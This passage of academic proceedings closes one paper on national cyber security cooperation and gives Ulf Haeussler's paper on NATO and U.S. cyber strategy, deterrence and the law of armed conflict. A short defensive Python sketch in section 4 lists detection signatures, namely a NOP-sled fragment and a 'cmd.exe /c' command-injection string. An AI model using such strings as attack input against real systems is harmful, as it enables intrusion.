A suggested approach to create Nation State responsibility in building a credible cyber system<br />

involves the following steps:<br />

- Developing a national strategy and making sure all agencies and major stakeholders follow it;<br />

- Establishing a national endorsement body for cyber security;<br />

- Establishing a national coordination mechanism;<br />

- Including all professional communities, the private sector and others in the national cyber security effort; and<br />

- Providing necessary resources and making institutional changes (Tiirmaa-Klaar 2010).<br />

If all the States internationally can implement their own credible cyber system, cooperation on an<br />

international cyber defense level will be easier to realize. As an initial attempt to enable a more<br />

uniform cyber defense system, the European Commission is planning to impose harsher penalties for<br />

cyber crimes. Large-scale attacks in Estonia and Lithuania in recent years have highlighted the need<br />

for a stronger stance on cyber crime. Estonia, Lithuania, France and the United Kingdom also have<br />

longer sentences for such crimes, and the European Commission is looking to harmonize practice<br />

across the member states. United States president Barack Obama has declared cyber crime to be a<br />

priority. In addition to stronger laws, the European Union is looking to set up a system through which<br />

member states can contact each other quickly to notify one another of attacks. That would help to<br />

build a picture of the scope of cyber crime (Geers ND).<br />

7. Conclusion<br />

The Internet has changed almost all aspects of human life, including the nature of warfare. Every<br />

political and military conflict now has a cyber dimension, whose size and impact are difficult to predict.<br />

"The ubiquitous nature and amplifying power of the Internet mean that future victories in cyber space<br />

could translate into victories on the ground. National critical infrastructures, as they are increasingly<br />

connected to the Internet, will be natural targets during times of war. Therefore, nation-states will<br />

likely feel compelled to invest in cyber warfare as a means of defending their homeland and as a way<br />

to project national power" (Geers ND).<br />

The international scope of the Internet and the wide reach of technology have a tremendous<br />

impact on the nature of war and crime globally. This article has shown the impact of technological<br />

revolutions on warfare, the South African legislative system affecting warfare and cyber war, and the<br />

need for international cyber defense collaboration.<br />

References<br />

ECT Act (Electronic Communications and Transactions Act No 25 of 2002). (2002). Available from:<br />

http://www.acts.co.za/ect_act/ (Accessed 10 October 2010).<br />

FIRST. (2009). FIRST: Teams around the world. Available from: http://www.first.org/members/map/ (Accessed 14<br />

October 2010).<br />

Gardner, F. (2009). Nato's cyber defence warriors. BBC News. Available from:<br />

http://news.bbc.co.uk/2/hi/europe/7851292.stm (Accessed 22 September 2010).<br />

Geers, K. (ND). Cyber Defence. Available from: http://www.vm.ee/?q=en/taxonomy/term/214 (Accessed 22<br />

September 2010).<br />


Giles, J. (2010). How will the PPI Bill affect you? Available from:<br />

http://www.michalsonsattorneys.com/how-will-the-ppi-bill-affect-you/2586 (Accessed 10 October 2010).<br />

Government Gazette. (2003). Vol. 451 Cape Town 15 January 2003 No. 24250. No. 54 of 2002: Promotion of<br />

Access to Information Amendment Act, 2002.<br />

International Standards Organization. (2008). ISO/IEC 27005:2008. Information security risk management.<br />

Available from: http://www.iso.org/iso/catalogue_detail?csnumber=50297 (Accessed 10 October 2010).<br />

Kelsey, JTG. (2008). Hacking into International Humanitarian Law: The Principles of Distinction and Neutrality in<br />

the Age of Cyber Warfare. P1427. Available from:<br />

http://heinonline.org/HOL/LandingPage?collection=journals&handle=hein.journals/mlr106&div=64&id=&page= (Accessed 22 September<br />

2010).<br />

Krepinevich, AF. (2003). Keeping pace with the military-technological revolution. Available from:<br />

http://www.issues.org/19.4/updated/krepinevich.pdf (Accessed 22 September 2010).<br />

Kulesza, J. (2010). State responsibility for acts of cyber-terrorism. 5th GigaNet Symposium, Vilnius, Lithuania.<br />

Markoff, J. (2010). Step Taken to End Impasse Over Cybersecurity Talks. Available from:<br />

http://www.nytimes.com/2010/07/17/world/17cyber.html?_r=1 (Accessed 8 October 2010).<br />

NATO. (ND). Defending against cyber attacks. Available from:<br />

http://www.nato.int/cps/en/natolive/topics_49193.htm (Accessed 22 September 2010).<br />

O'Hanlon, ME. (2000). Technological change and the future of warfare. Brookings Institution Press: Washington.<br />

Owen, RS. (2008). Infrastructures of Cyber Warfare. Chapter V. In: Janczewski, L. & Colarik, AM. Cyber warfare<br />

and cyber terrorism. Information Science Reference: London.<br />

PAIA Act (Promotion of Access to Information Act No 2 of 2000 as amended). (2000). Available from:<br />

http://www.dfa.gov.za/department/accessinfo_act.pdf (Accessed 10 October 2010).<br />

Republic of South Africa. (2010). Protection of Personal Information Bill. Available from:<br />

http://www.justice.gov.za/legislation/bills/B9-2009_ProtectionOfPersonalInformation.pdf (Accessed 10<br />

October 2010).<br />

RIC Act (Regulation of Interception of Communications and Provision of Communication-related Information Act).<br />

(2002). Available from: http://www.acts.co.za/ric_act/whnjs.htm. (Accessed 10 October 2010).<br />

SA Constitution. (1996). Available from: http://www.info.gov.za/documents/constitution/index.htm (Accessed 10<br />

October 2010).<br />

Tiirmaa-Klaar, H. (2010). International Cooperation in Cyber Security: Actors, Levels and Challenges. Cyber<br />

security 2010, Brussels, 22 September 2010 (Conference).<br />

UN Information Officer. (2010). Delegates Consider Best Response to Cybercrime as Congress Committee<br />

Takes Up Dark Side of Advances in Information Technology. Available from:<br />

http://www.un.org/News/Press/docs/2010/soccp349.doc.htm (Accessed 10 October 2010).<br />

Warren, MJ. (2008). Terrorism and the internet. Chapter VI. In: Janczewski, L. & Colarik, AM. Cyber warfare and<br />

cyber terrorism. Information Science Reference: London.<br />

Williams, G. & Arreymbi, J. (2007). Is cyber tribalism winning online information warfare? ISSE/ SECURE 2007<br />

Securing Electronic Business Processes (2007): 65-72, January 01, 2007.<br />

Wilson, C. (2007). Information Operations, Electronic Warfare and Cyberwar: Capabilities and related policy<br />

issues. CRS report for Congress. Available from: www.fas.org/sgp/crs/natsec/RL31787.pdf (Accessed 17<br />

September 2010).<br />


Cyber Strategy and the Law of Armed Conflict<br />

Ulf Haeussler<br />

National Defense University, Washington, USA<br />

ulf.haeussler@ndu.edu<br />

Author’s note: At the time of writing, the author was Assistant Legal Advisor Operational Law, Headquarters,<br />

Supreme Allied Commander Transformation (NATO HQ SACT). The views expressed herein are the author's<br />

own and do not necessarily reflect the official position or policy of NATO and/or HQ SACT. Abstract: At its Lisbon<br />

Summit (November 2010), NATO has adopted its Strategic Concept. The U.S. may soon adopt its Cyberstrategy<br />

3.0 (originally expected for December 2010). Both strategy documents will contribute to a growing policy<br />

consensus regarding cyber security and defence as well as provide better policy insights regarding cyber offence.<br />

In doing so, they will contribute to a better understanding of how NATO and the U.S. want to prepare for, and<br />

conduct, cyber warfare in a manner congruent with the law of armed conflict. In addition, they will determine to<br />

what extent this branch of the law needs to be better understood, developed, or reformed. Accordingly, this paper<br />

indicates how the existing legal and policy frameworks intersect with practical aspects of cyber warfare and<br />

associated intelligence activities, analyses how the new strategy documents develop and change the existing<br />

policy framework, and what repercussions this may have for the interpretation and application of the law of armed<br />

conflict. It also demonstrates how the new strategy documents inform the policy and legal discourse and hence<br />

help confirm that NATO and U.S. as well as other NATO Nations' cyber activities are, and will continue to be,<br />

lawful and legitimate.<br />

Keywords: NATO Strategic Concept 2010, U.S. Cyberstrategy 3.0, Law of Armed Conflict, collective security,<br />

collective defence<br />

1. Introduction<br />

Cyberspace is increasingly referred to as one of the global commons and as the fifth domain in which<br />

warfare may occur (Lynn 2010, 101). Activities in cyberspace as well as involving the use of cyber<br />

capabilities to create, or contribute to the creation of, effects in any one of the other commons, or<br />

domains, have attracted significant discussion and analysis among technical experts, policymakers,<br />

and legal scholars. The ensuing efforts to develop frameworks for cyberspace and the use of<br />

associated capabilities (hereinafter collectively referred to as 'cyberspace') bring various perspectives<br />

to bear. Cyberspace is multifunctional; it equally attracts private activities (with a strong business<br />

component) and governments' official conduct as well as associated competing, if not conflicting,<br />

interests. Not surprisingly, cyberspace has its unarguable dark side – on both its non-governmental<br />

and its governmental end. The range of challenges and threats associated with the dark side of<br />

cyberspace comprises, but is not limited to, privacy intrusions, financial loss, damage and destruction<br />

in the physical domains, the potential of injury or even death, and (other) adverse effects on the<br />

effectiveness of government. These challenges and threats reflect the large extent to which<br />

computers and other information and communication technology devices can be leveraged as<br />

weapons by non-governmental actors. Further challenges may arise out of policy positions adopted<br />

by some non-governmental actors. For instance, the so-called 'internet pirates' endorse the notion of<br />

a cyberspace beyond any government control whatsoever – a desire which, were it to come true,<br />

might exacerbate all other challenges and threats referred to above.<br />

Attempts to characterise cyber challenges and threats have usually used references to challenges<br />

and threats in the physical domains, to which the word 'cyber' is added as a qualifier, enabling the<br />

creation of catchwords such as cyber crime, cyber terrorism, and cyber attack. The terminology<br />

developed using this method is attractive because it triggers analogies with known phenomena.<br />

However, it is also prone to carrying misleading connotations since such analogies may easily fuel<br />

misconceptions. For instance, the terms 'cyber crime' and 'cyber terrorism' do not capture the whole<br />

range of non-governmental actors' malicious activities; moreover, they do not even attempt to address<br />

possible links between non-governmental actors and their potential governmental sponsors. By<br />

contrast, the term 'cyber attack' is too broad. Thus, information gathering activities may be referred to<br />

as cyber attacks, though they might not necessarily or directly cause tangible damage. The<br />

undifferentiated use of the notion of 'attack' may foster arguments by which a nation's inherent right of<br />

self-defence is considered relevant to cyber activities or actions which neither have nor cause<br />

potential or actual adverse effects. These examples may be indicative of a gap between technological<br />

realities and the terminology used in policymaking as well as legal interpretation.<br />


Following the cyber incident Estonia sustained in 2007 and the probable integration of a cyber line of<br />

operation in the Russian campaign against Georgia in 2008, the discussion and analysis regarding<br />

cyber challenges and threats has gathered new momentum. The recent Stuxnet incident might have<br />

taken this discussion and analysis to a turning point, for many observed that the Rubicon had been<br />

crossed regarding the development of real 'cyber weapons'. NATO's 2010 Strategic Concept and the<br />

expected U.S. Cyberstrategy 3.0 (will) represent a sophisticated approach towards cyber challenges<br />

and threats. As far as collective security and defence are concerned, they (will) confirm that the dark<br />

side of cyberspace involves more than just economic crime, and that most of its emanations can be<br />

effectively addressed: through the existing mechanisms designed to maintain and restore<br />

international peace and security as well as the principles and rules governing the conduct of<br />

hostilities, on the one hand, and the protection of civilians and other individuals in the course of armed<br />

conflict on the other hand. At the same time, they (will) indicate why and how these existing<br />

frameworks support preventive measures and hence enhance the full spectrum of collective cyber<br />

security and defence. As a result, they (will) inform the interpretation and application of both branches<br />

of the law of armed conflict, that is, the legal framework informing decision-making processes on<br />

whether as well as how to use force in international relations or against non-governmental actors.<br />

2. Developing cyber policy consensus regarding collective defence<br />

Like any other legal source, international law, including the law of armed conflict, is rooted in policy<br />

consensus. For the challenges and threats associated with the dark side of cyberspace to be<br />

captured by the law of armed conflict they must be an integral part of the policy consensus regarding<br />

the relevant international agreements and customary rules. Two basic concepts used by the law of<br />

armed conflict stand out in this respect: the notion of 'armed attack' (cf. Article 51 of the UN Charter,<br />

Article 5 of the North Atlantic Treaty, and Article 7 of the Rio Treaty), triggering the right of individual<br />

and collective self-defence; and the notion of 'attack' (cf. Article 49 of the First Additional Protocol to<br />

the Geneva Conventions), guiding many aspects of the conduct of hostilities within an armed conflict.<br />

These terms of art also reflect the fundamental differentiation within the law of armed conflict between<br />

the principles and rules that govern the legality of the use of force in international relations (jus ad<br />

bellum) and the conduct of hostilities (jus in bello).<br />

Political and military strategies have an important role to play in the process of consensus-building<br />

regarding international law. They reflect how States individually and collectively assess their scope of<br />

action – assuming for this purpose that no State has a genuine desire to consider acting, or to actually<br />

act, deliberately illegally. If this assumption is accepted, then NATO's Strategic Concept 2010 indicates<br />

more than that cyber incidents may trigger its collective security and defence mechanisms. It also<br />

confirms, as a matter of policy consensus, that cyber incidents are capable of amounting to an armed<br />

attack within the coordinates of the law of armed conflict. Likewise, the U.S. Department of Defense's<br />

readiness to coordinate its cyber defence effort across the government, with allies, and with partners<br />

in the commercial sector (cf. Lynn 2010, 103) does not only leverage collective security and defence<br />

as one aspect of the U.S. response to cyber threats. It also indicates that nothing in the law of armed<br />

conflict is considered an obstacle to utilising these mechanisms.<br />

Since an effort at developing consensus among 28 sovereign States will yield a different result than<br />

policy determinations within one sovereign State's government, the development of NATO cyber<br />

defence policy until 2010 will be analysed to identify the Euro-Atlantic common denominator,<br />

a denominator which – one would expect – the drafters of U.S. Cyberstrategy 3.0 are fully aware of.<br />

NATO's consensus-building process regarding cyber defence policy started with its Strategic Concept<br />

1999. In this document, NATO observed that 'state and non-state adversaries may try to exploit the<br />

Alliance's growing reliance on information systems through information operations designed to disrupt<br />

such systems' (NATO 1999, paragraph 23). However, only after Estonia had sustained the well-known<br />

cyber incident did NATO actually adopt a cyber defence policy and start developing<br />

structures and authorities to carry it out (NATO 2008, paragraph 47). Roughly two years after the<br />

cyber incident sustained by Estonia and nearly a year after Russia had possibly integrated a cyber<br />

line of operation in its campaign against Georgia (cf. Gates 2009, 5; Ilves 2010; but see also<br />

Independent International Fact-Finding Mission 2010, Vol II, 217sqq), NATO still conceded that<br />

despite the establishment of its Cyber Defence Management Authority and improvements of the<br />

existing NATO Computer Incident Response Capability (NCIRC), its cyber defence capabilities yet<br />

had to achieve full readiness (NATO 2009, paragraph 49). That notwithstanding, since 2008 NATO<br />

policy couples the notions of protecting key information and communication systems on which the<br />


Alliance and Allies rely with countering – later rephrased as responding to – cyber attacks using its<br />

own cyber defence capabilities as well as leveraging linkages between NATO and national authorities<br />

(NATO 2008, paragraph 47 and NATO 2009, paragraph 49), and – envisaged since 2009 –<br />

appropriate partnerships and cooperation (NATO 2009, ibid.).<br />

NATO policy developed since 1999 is correctly based on the observation that NATO and its Nations<br />

rely significantly on information and communication systems, a reliance susceptible to exploitation. It is<br />

worthwhile mentioning that the observation referred to is not a reference to the notion of 'cyber<br />

exploitation' which by definition captures non-destructive information gathering activities which may be<br />

performed by strategic competitors and potential adversaries (Owens et al. 2009, 1). Conversely, in<br />

using the term 'disrupt', NATO’s Strategic Concept 1999 had introduced language which covers both<br />

potential destructive effects of cyber attacks and other adverse effects of the same scale and gravity.<br />

(Note that the term 'to disrupt' is defined as 'to cause disorder in something' (Oxford 1989, 348);<br />

'causing disorder' in ICT is tantamount to causing it to lose part or all of its operability.) The language<br />

used at a later stage does not indicate a change of this appraisal of the possible consequences of<br />

cyber attacks. In particular, the notion of countering cyber attacks, used in the Bucharest Summit<br />

Declaration 2008, is sufficiently close to the general doctrinal notion of counterattack to suggest that<br />

its drafters had the idea of counter-offensive in mind. The fact that NATO later substituted the notion<br />

of 'responding' to cyber attacks for the initially used term 'countering' them does not contradict this<br />

assessment since countering cyber attacks is but one possible option for responding to them.<br />

Actually, 'responding' is broader in scope; in addition to counter-offensive measures it also captures a<br />

wide range of other measures including those of a political and diplomatic nature.<br />

Taking the different points of view regarding the legal nature of cyber attacks into account, NATO's<br />

policy documents help consolidate the developing consensus regarding the interpretation of the law<br />

of armed conflict in cyber matters. Fully aware of the unsettled legal nature of cyber attacks, NATO<br />

has agreed to multiple documents which in unison do not rule out that cyber attacks – initially referred<br />

to as information operations – may be considered as destructive, or potentially destructive, in nature.<br />

Given that the capacity to be destructive, or potentially destructive, in nature is a quintessential<br />

characteristic of both armed attacks as defined for the purposes of the jus ad bellum and attacks as<br />

defined for the purposes of the jus in bello, NATO's policy declarations necessarily imply the<br />

Alliance’s tacit endorsement of the view that cyber attacks – at least theoretically – can have the<br />

nature of armed attacks and/or attacks, as the case may be. It is important to note that, depending on<br />

the circumstances, an act opening hostilities may coincidentally be an armed attack from a jus ad<br />

bellum perspective and an attack from a jus in bello perspective. However, this coincidence would be<br />

one of fact rather than an amalgamation of these notions which belong to different branches of<br />

international law and hence warrant separate assessment.<br />

International treaty law often captures new factual developments through subsequent agreement<br />

regarding the interpretation of a treaty or the application of its provisions (cf. Article 31(3)(a) of the<br />

Vienna Convention on the Law of Treaties). Whilst NATO policy does not represent agreement which<br />

would bring all cyber attacks within the ambit of the North Atlantic Treaty and other relevant<br />

international agreements, it does a fortiori not exclude individual cyber attacks from being considered<br />

as an armed attack and/or an attack.<br />

NATO's Strategic Concept 2010 confirms and reinforces earlier policy. Its assessment of the security<br />

environment states that cyber attacks 'can reach a threshold that threatens national and Euro-Atlantic<br />

prosperity, security and stability', and that foreign militaries can be 'the source of such attacks' (NATO<br />

2010a, at paragraph 12). In addressing Article 5 of the North Atlantic Treaty, NATO stresses its<br />

responsibility 'to protect and defend our territory and our population against attack' (id., paragraph 16).<br />

Whilst critical infrastructure is captured by the notion of territorial defence, the reference to the<br />

population should be read as comprising key elements of statehood such as governability – essential<br />

to human security – and the integrity of democratic decision-making – an essential tenet of<br />

participatory democracy (Häußler 2010). NATO has also expressly embraced the need to further<br />

develop its 'ability to prevent, detect, defend against and recover from cyber-attacks' (NATO 2010a,<br />

paragraph 19) and its aim to 'carry out the necessary … information exchange for assuring our<br />

defence against ... emerging security challenges'. The notion of 'emerging security challenges',<br />

though not expressly defined, is illustrated by the portfolio of the recently established NATO<br />

Headquarters directorate carrying the same name, which comprises challenges arising in and out of<br />



Ulf Haeussler<br />

cyberspace. The Lisbon Summit Declaration further elaborates and reinforces the full integration<br />

of cyber defence in NATO's collective security and defence framework (NATO 2010b, paragraph 47).<br />

3. Leveraging collective defence for collective security through deterrence<br />

Credible deterrence is a complex achievement which traditional strategy used to build on multiple<br />

pillars, involving containment (including through the prospect of retaliation) and arms control (that is,<br />

confidence building and disarmament). NATO and the U.S. use different definitions of deterrence in<br />

military doctrine. These definitions have in common that both are concerned with potential<br />

adversaries' perceptions of the relationship between action and counteraction. However, they<br />

describe the method to influence potential adversaries' mindsets in fairly different manners. NATO<br />

defines the notion of deterrence as '[t]he convincing of a potential aggressor that the consequences of<br />

coercion or armed conflict would outweigh the potential gains'; the definition continues to observe that<br />

'[t]his requires the maintenance of a credible military capability and strategy with the clear political will<br />

to act' (NATO Glossary, 2-D-6). By contrast, the U.S. definition of deterrence is more outspoken about<br />

the method by which to influence potential adversaries' mindsets. It clearly favours containment,<br />

explaining that '[d]eterrence is a state of mind brought about by the existence of a credible threat of<br />

unacceptable counteraction'. On this basis, it is able to describe the nature of the mindset desired on<br />

the part of potential adversaries in capturing the notion of deterrence through a reference to '[t]he<br />

prevention from action by fear of the consequences' (DoD Dictionary, 139).<br />

International security is a product of multiple factors of which deterrence is but one. Resilience<br />

towards potential threats and rules incentivising desired conduct are equally important; they are tools<br />

to prevent differences from growing into disputes, or to achieve the pacific settlement of the latter, as the case<br />

may be. However, experience confirms that incentivising tools will not always suffice to avert all<br />

potential threats. Accordingly, cyber deterrence – based on the availability of defence and counter-offence<br />

capabilities as well as the political will to use them, if required – will make a viable contribution<br />

to international security. NATO is ready for cyber deterrence. It is continuously improving relevant<br />

capabilities, and the Strategic Concept 2010 has tied the knot on the evolving integration of cyber<br />

defence in the notion of collective defence.<br />

NATO is not only increasingly well prepared to develop effective deterrence against cyber attacks the<br />

organisation itself or its members may have to face in the future. The Alliance is also able, as a matter<br />

of policy, to deter undesirable usages of cyberspace affecting its operations through a cyber line of<br />

operation, regardless of whether they serve the purpose of collective defence (Article 5 of the North<br />

Atlantic Treaty) or have the character of Non-Article 5 Crisis Response Operations (Häußler 2011,<br />

168).<br />

In light of the foregoing, NATO's policy choice not to exclude cyber attacks from its collective defence<br />

mechanism (Article 5 of the North Atlantic Treaty) has significant implications for deterrence.<br />

As long as its collective defence mechanism is a viable option, the Alliance can – a maiore ad minus –<br />

even more convincingly tackle challenges associated with cyberspace through its collective security<br />

mechanism. Whilst the latter primarily relies on consultations as envisaged in Article 4 of the North<br />

Atlantic Treaty, its invocation may result in effective measures short of the use of force. As indicated<br />

by the single reported case of an express invocation of Article 4 by a NATO Nation, consultations<br />

pursuant to this article may lead to the deployment of appropriate capabilities – up to and including<br />

those represented by armed forces – to respond to the aforementioned security threats. In February<br />

2003, Turkey asked for consultations concerning its defence needs arising out of the impending<br />

resumption of hostilities against Iraq (Gallis 2003, 1). The consultations were conducted by NATO's<br />

Defence Planning Committee which requested military advice from NATO's Military Authorities, and,<br />

having obtained the latter, authorised the implementation of defensive measures (NATO DPC 2003).<br />

In a similar manner, in the event of a cyber incident, NCIRC Rapid Reaction Teams (RRTs) may<br />

support national Computer Emergency Response Teams (CERTs) (cf. NCSA 2009). By reinforcing<br />

existing defences, the deployment of RRTs may make an effective contribution to deterring unfriendly<br />

activities whose prospect of success they reduce or deny. Accordingly, consultations may result in<br />

preventive deterrence: provided they are not a means of last resort in a misguided approach focusing<br />

on "talking only" whilst "no action" is allowed to occur.<br />

As indicated above, NATO's cyber security and defence policy is geared towards supporting national<br />

efforts. This approach extends the consolidated practice of cooperation within NATO to the<br />

cyberspace. As illustrated by the response to the 9/11 attack on the U.S. as well as the steps<br />


following the invocation of Article 4 by Turkey, NATO's collective security and defence mechanisms<br />

rely on the assessment of the Nation affected. Though NATO first and foremost provides an umbrella<br />

enabling Allies' mutual support, it may also decide to launch operations led by the Alliance, such as<br />

Operation Active Endeavour following the 9/11 attack. NATO's strategic policy choices regarding<br />

cyber security and defence may in a similar manner serve as an interface for connecting national<br />

security and defence efforts. After its adoption, Cyberstrategy 3.0 may demonstrate what the U.S.<br />

expects as well as what it is prepared to contribute to achieve such 'greater levels of cooperation [as]<br />

needed to stay ahead of the cyberthreat' (Lynn 2010, 105).<br />

4. Cyberstrategy 3.0 – cyber defence as an integral part of national defence<br />

NATO's positive acknowledgement, through its strategic policy consensus, of a nation's sovereign<br />

right to consider cyber defence as an integral part of national security and defence, has clear legal<br />

implications. It is this acknowledgement by which NATO has confirmed that national cyber security<br />

and defence is eligible for support through its collective security and defence mechanisms. That said,<br />

there are two different ways of looking at national cyberstrategy. On the one hand, a national<br />

cyberstrategy is likely to represent the codification of national cyber security and defence concerns<br />

ranging from a description of the situation, own and adversarial, through a survey of the broader<br />

operating environment to the resulting assessment and conclusions. On the other hand, a national<br />

cyberstrategy may also indicate in what situations NATO could theoretically expect to receive<br />

requests for consultation under Article 4, or for collective self-defence under Article 5 of the North<br />

Atlantic Treaty, as well as what capabilities might be available to support collective efforts made under<br />

the auspices of the Alliance.<br />

The description of the situation in cyberspace in which constitutional democracies in general and<br />

NATO Nations in particular are likely to find themselves is captured by the observation that: 'In less<br />

than a generation, information technology in the military has evolved from an administrative tool for<br />

enhancing office productivity into a national strategic asset in its own right' (id., 98).<br />

Adversaries can easily exploit this situation by leveraging off-the-shelf technology which is not only<br />

available at comparably low cost but also can be put to use by a limited number of personnel – '[a]<br />

dozen determined computer programmers' (ibid.) – 'if they find a vulnerability to exploit' (ibid.). The<br />

unpleasant reality is that 'today anyone with a computer can engage in some level of cyber<br />

destruction' (Vamosi 2011, quoting the National Defense University's F.D. Kramer). In addition, the<br />

estimate that programming the Stuxnet code may have taken about half a year also indicates that<br />

warning periods for a force build-up in cyberspace are much shorter than those for a<br />

conventional force build-up. However, there may not be any warning period at all if, as in the case of<br />

Stuxnet, an adversary manages to launch a zero-day attack or leverage a zero-day exploit (Wikipedia,<br />

Zero Day Attack).<br />

That said, it is not surprising that '[i]n cyberspace, the offense has the upper hand', a factor requiring a<br />

flexible strategy since '[i]n an offense-dominant environment, a fortress mentality will not work' (Lynn<br />

2010, 99). Accordingly, evolving U.S. cyber strategy is likely to put less emphasis on containment<br />

than traditional strategy as embodied in military doctrine. According to the U.S. Deputy Secretary of<br />

Defense, 'traditional Cold War deterrence models of assured retaliation do not apply to cyberspace,<br />

where it is difficult and time consuming to identify an attack's perpetrator' (ibid.). This observation<br />

does not simply shift the emphasis from containment to arms control. On the contrary, '[t]raditional<br />

arms control regimes would likely fail to deter cyberattacks because of the challenges of attribution,<br />

which make verification of compliance almost impossible.' (id., 100).<br />

In essence, this means that both traditional elements of deterrence seem to be considered<br />

unsatisfactory for the purposes of cyber deterrence. It is hence fairly unlikely that efforts made by<br />

some States to leverage support for cyber arms control within the United Nations will yield tangible<br />

results any time soon. Whilst cyber deterrence does not abandon the approach based on influencing<br />

potential adversaries' mindsets (Vamosi 2011) it will most likely have to rely on different methods to<br />

achieve this desired effect. In particular, cyber 'deterrence will necessarily be based more on denying<br />

any benefit to attackers than on imposing costs through retaliation' (Lynn 2010, 99sq). This approach<br />

couples elements of 'defensive resilience [within] cyber networks' (Vamosi 2011, quoting F.D. Kramer)<br />

and active defence. To that end, it may require different models of 'international norms of behavior in<br />

cyberspace … such as that of public health or law enforcement' (Lynn 2010, 100). Normative models<br />

derived from international environmental law might also be instrumental. In the U.S., active defence of<br />


defence sector computer networks complements 'ordinary computer hygiene, which keeps security<br />

software and firewalls up to date, and sensors, which detect and map intrusions' (id., 103). Defence<br />

sector networks rely on systems that, using (signals) intelligence warnings, 'automatically deploy<br />

defenses to counter intrusions in real time' (ibid.). 'They work by placing scanning technology at the<br />

interface of military networks and the open Internet to detect and stop malicious code before it passes<br />

into military networks' (ibid.). Moreover, the notion of active defence also covers the effort to detect<br />

intruders who have managed to escape detection at the interface (ibid.).<br />
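The perimeter scanning described above can be illustrated with a minimal sketch. The signatures, payloads and function names below are invented for illustration and are not drawn from any actual defence-sector system:

```python
# Minimal sketch of signature scanning at a network interface: traffic
# entering from the open Internet is checked against known malicious byte
# patterns before being allowed into the internal network. The signature
# list and traffic samples are invented for illustration only.

KNOWN_MALICIOUS_SIGNATURES = [
    b"\x90\x90\x90\x90",   # e.g. a NOP-sled fragment
    b"cmd.exe /c",         # e.g. a command-injection payload
]

def scan_at_interface(payload: bytes) -> bool:
    """Return True if the payload may pass into the internal network."""
    return not any(sig in payload for sig in KNOWN_MALICIOUS_SIGNATURES)

def forward(payload: bytes) -> str:
    # A payload matching a known signature is stopped in real time.
    # A zero-day payload matches nothing and passes -- which is why the
    # text pairs this perimeter scanning with the detection of intruders
    # who escape it.
    return "forwarded" if scan_at_interface(payload) else "blocked"
```

A payload containing a listed signature is blocked at the interface, while a genuine zero-day payload, by definition absent from any signature list, would be forwarded.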

In sum, the evolving U.S. approach of defensive resilience coupled with active defence and NATO's<br />

emerging notion of preventive deterrence seem to correspond harmoniously. As cyberstrategy<br />

development continues, the impact of NATO's and national approaches on the conduct of military<br />

operations in general and the conduct of hostilities in particular will require associated legal analysis.<br />

Rather than focusing on cyber operations in isolation, this analysis will have to consider that cyber<br />

warfare may become part of a spectrum of military responses available to the relevant policymakers<br />

(cf. Vamosi 2011).<br />

5. Conclusion<br />

From an international law perspective, the choices regarding cyber security and defence made by<br />

NATO's Strategic Concept 2010 correspond to questions related to the legality of use of force (jus ad<br />

bellum) and implicitly defer questions pertaining to the legal framework governing the conduct of<br />

hostilities (jus in bello) to future analysis. National cyberstrategy development points in the same<br />

direction. From an overall perspective, cyberstrategy development has the demonstrated potential to<br />

accelerate consensus building processes regarding the question of whether cyber attacks can be<br />

matters of national security and defence, including through effective deterrence, and in that capacity<br />

also trigger collective security and defence mechanisms like those based on the North Atlantic Treaty.<br />

At the same time, existing and evolving cyberstrategies do not yet provide all the insights needed on<br />

important questions, such as how to leverage normative models of public health and environmental<br />

protection, and how to adapt to the realities of cyberspace the notions of combatancy and direct<br />

participation in hostilities and the targetability of civilian objects turned military objectives. Answering<br />

these questions still involves challenges, since technical realities may defy the development of the<br />

prognoses required to form an expectation regarding collateral damage and an anticipation of military<br />

advantage with a sufficient degree of predictability.<br />

References<br />

Gallis, P. (2003) NATO’s Decision-Making Procedure (CRS Report for Congress, Order Code RS21510, 05 May<br />

2003), http://www.fas.org/man/crs/RS21510.pdf<br />

Gates, R.M., U.S. Secretary of Defense (2009) "The National Defense Strategy", Joint Forces Quarterly, issue<br />

52, 1 st quarter 2009, 1-7<br />

Häußler, U. (2010) "Cyber Security and Defence from the Perspective of Articles 4 and 5 of the North Atlantic<br />

Treaty", Tikk, E. and Talihärm, A.-M., International Cyber Security Legal & Policy Proceedings, 100-126<br />

Häußler, U. (2011) "Crisis Response Operations in Maritime Environments", Odello, M. and Piotrowicz, R.,<br />

International Military Missions and International Law (forthcoming: Brill, Amsterdam), 161-210<br />

Ilves, His Excellency Mr. T.H., President of the Republic of Estonia (2010) Opening Address at the June 2010<br />

Cyber Conflict Conference, http://www.ccdcoe.org/conference2010/329.html; cf.<br />

http://www.nato.int/cps/en/SID-B2AD4DE6-E0B91B4E/natolive/news_64615.htm?<br />

Independent International Fact-Finding Mission on the Conflict in Georgia established by the European Union<br />

(2010), Report, Vol II<br />

Lynn, W.J. III (2010) "Defending a New Domain – The Pentagon’s Cyberstrategy", Foreign Affairs Volume 89 Number 5,<br />

97-108<br />

NATO (1999) The Alliance's Strategic Concept dated 24 April 1999,<br />

http://www.nato.int/cps/en/natolive/official_texts_27433.htm<br />

NATO (2008) Bucharest Summit Declaration dated 03 April 2008,<br />

http://www.nato.int/cps/en/natolive/official_texts_8443.htm<br />

NATO (2009) Strasbourg / Kehl Summit Declaration dated 04 April 2009,<br />

http://www.nato.int/cps/en/natolive/news_52837.htm?mode=pressrelease<br />

NATO (2010a) Active Engagement, Modern Defence – Strategic Concept 2010 dated 19 November 2010,<br />

http://www.nato.int/lisbon2010/strategic-concept-2010-eng.pdf<br />

NATO (2010b) Lisbon Summit Declaration dated 20 November 2010,<br />

http://www.nato.int/cps/en/natolive/official_texts_68828.htm<br />

NATO Defence Planning Council (DPC) (2003) Decision Sheet, http://www.nato.int/docu/pr/2003/p030216e.htm,<br />

cf. Press Release (2003)013 at http://www.nato.int/docu/pr/2003/p03-013e.htm<br />

NATO, NATO Glossary of Terms and Definitions (AAP-6) (annually updated publication) (quoted NATO Glossary)<br />


NCSA (2009) NCSA Supports the Cyber Coalition 2009,<br />

http://www.ncsa.nato.int/news/2009/20091217_NCSA_Supports_the_Cyber_Coalition_2009.html<br />

Owens, W.A., Dam, K.W. and Lin, H.S. (2009) (for the National Research Council) Technology, Policy, Law, and<br />

Ethics Regarding U.S. Acquisition and Use of Cyberattack Capabilities<br />

Oxford University Press (1989) Oxford Advanced Learner's Dictionary<br />

U.S. Department of Defense (DoD) Dictionary of Military and Associated Terms as amended through April 2010<br />

(JP 1-02) (quoted DoD Dictionary)<br />

Vamosi R. (2011) The US Needs To Learn To Limit–Not Win–A Cyber War,<br />

http://blogs.forbes.com/firewall/?p=2604<br />

Wikipedia "Zero Day Attack", http://en.wikipedia.org/wiki/Zero-day_attack (last visited 15 November 2010)<br />



